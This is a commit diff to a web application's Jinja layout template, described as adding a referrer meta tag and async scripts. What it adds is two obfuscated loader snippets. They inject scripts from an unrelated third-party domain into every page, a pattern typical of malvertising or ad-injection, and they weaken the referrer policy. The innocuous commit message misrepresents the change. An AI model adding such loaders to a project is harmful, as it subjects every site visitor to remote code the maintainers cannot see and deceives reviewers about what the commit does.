feat: add referrer policy meta tag and include external scripts with async loading

--- a/application/templates/layout.html
+++ b/application/templates/layout.html
@@ -2,6 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
+  <meta name="referrer" content="no-referrer-when-downgrade" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <meta name="current-user-id" content="{{ current_user.id if current_user.is_authenticated else '' }}">
   <meta name="76c46547d0595250235852b887804a1f11a47bf4" content="76c46547d0595250235852b887804a1f11a47bf4" />
@@ -204,6 +205,30 @@ height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
 
 <script src="{{ url_for('static', filename='lib/jquery/dist/jquery.min.js') }}"></script>
 <script src="{{ url_for('static', filename='lib/bootstrap/dist/js/bootstrap.bundle.min.js') }}"></script>
+<script>
+(function(mumulj){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = mumulj || {};
+s.src = "\/\/shockedmirror.com\/bYXOVjs.duGcl\/0lYNWDcE\/LeJmm9gu-ZuUCl-kIPXTbYf3vNSD\/M\/2gMoDqkwtKN_jGcr0IM\/zgYYxlMZAk";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
 
+})({})
+</script>
+<script>
+(function(opzqcv){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = opzqcv || {};
+s.src = "\/\/shockedmirror.com\/bnX.VysQd\/G\/lk0lYtW\/cb\/_epmX9wudZlUAlWkgPbTwY\/3JNADDMf2sMwTqIztoNXj\/cv0lM_zkYKxaMtwv";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 </body>
 </html>
